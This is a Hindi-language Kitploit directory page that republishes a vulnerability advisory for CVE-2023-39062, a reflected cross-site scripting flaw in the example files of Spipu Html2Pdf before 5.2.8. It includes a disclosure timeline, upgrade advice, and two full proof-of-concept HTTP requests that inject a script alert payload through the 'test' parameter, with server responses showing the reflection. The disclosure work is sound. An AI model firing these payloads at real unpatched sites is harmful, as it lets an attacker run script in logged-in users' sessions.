Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-39062 — Spipu Html2Pdf < 5.2.8 - उदाहरण फ़ाइलों में XSS कमजोरियाँ | Kitploit
उपकरण/GitHubGitHub/afine-com/cve-2023-39062
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणवेब सुरक्षापेपर और शोधलर्निंग और शिक्षा
GitHubafine-com/cve-2023-39062

CVE-2023-39062

Spipu Html2Pdf < 5.2.8 - उदाहरण फ़ाइलों में XSS कमजोरियाँ

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-39062

Spipu Html2Pdf < 5.2.8 - उदाहरण फ़ाइलों में XSS कमजोरियाँ।

समयरेखा

  • विक्रेता को कमजोरी की रिपोर्ट: 18.07.2023
  • नया स्थिर 5.2.8 संस्करण जारी: 18.07.2023
  • सार्वजनिक खुलासा: 23.08.2023

विवरण

Spipu Html2Pdf उदाहरण फ़ाइलों में क्रॉस-साइट-स्क्रिप्टिंग (XSS) कमजोरी। यह कमजोरी एक हमलावर को वर्तमान में लॉग-इन उपयोगकर्ता के संदर्भ में अविश्वसनीय जावास्क्रिप्ट कोड निष्पादित करने की अनुमति देती है।

यह कमजोरी example9.php और forms.php उदाहरण फ़ाइलों को पारित किए गए किसी भी पैरामीटर में मौजूद है।

forms.php स्क्रिप्ट के लिए उदाहरण अनुरोध:

root@kitploit:~
GET /html2pdf/examples/res/forms.php?test=abc"><script>alert(document.domain)</script> HTTP/1.1
Host: example.afine.com
Cookie: PHPSESSID=oiqo2oopiqt88teqgfb0a23vk0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

सर्वर प्रतिक्रिया:

root@kitploit:~
HTTP/1.1 200 OK
Server: Apache
Content-Length: 2215
Connection: close
Content-Type: text/html; charset=UTF-8

[...]

<page footer="form">
    <h1>Test de formulaire</h1><br>
    <br>
    <form action="http://example.afine.com:443/html2pdf/examples/res/forms.php?test=abc"><script>alert(document.domain)</script>">
        <input type="hidden" name="test" value="1">

[...]

example9.php स्क्रिप्ट के लिए उदाहरण अनुरोध:

root@kitploit:~
GET /html2pdf/examples/exemple09.php?test=/"><script>alert(document.domain)</script>abc/?nom=1 HTTP/1.1
Host: example.afine.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

सर्वर प्रतिक्रिया:

root@kitploit:~
HTTP/1.1 200 OK
Date: Sat, 08 Jul 2023 18:32:51 GMT
Server: Apache
X-Powered-By: PHP/7.4.8
Content-Length: 795
Connection: close
Content-Type: text/html; charset=UTF-8

[...]

<body>
<br>
Ceci est un exemple de génération de PDF via un bouton :)<br>
<br>
<img src="http://example.afine.com/html2pdf/examples/exemple09.php?test=/"><script>alert(document.domain)</script>abc/res/exemple09.png.php?px=5&amp;py=20" alt="image_php" ><br>
<br>
<br>
        <form method="get" action="">

[...]

यह समस्या प्रदान किए गए अनुरोध पैरामीटरों के स्वच्छीकरण की कमी के कारण हुई थी। यह समस्या Spipu Html2Pdf संस्करण 5.2.8 में ठीक कर दी गई है।

प्रभावित संस्करण

< 5.2.8

सलाह

Spipu Html2Pdf को 5.2.8 या नए संस्करण में अपडेट करें।

संदर्भ

  • https://github.com/spipu/html2pdf/blob/92afd81823d62ad95eb9d034858311bb63aeb4ac/CHANGELOG.md
  • https://nvd.nist.gov/vuln/detail/CVE-2023-39062
टूल डाउनलोड करें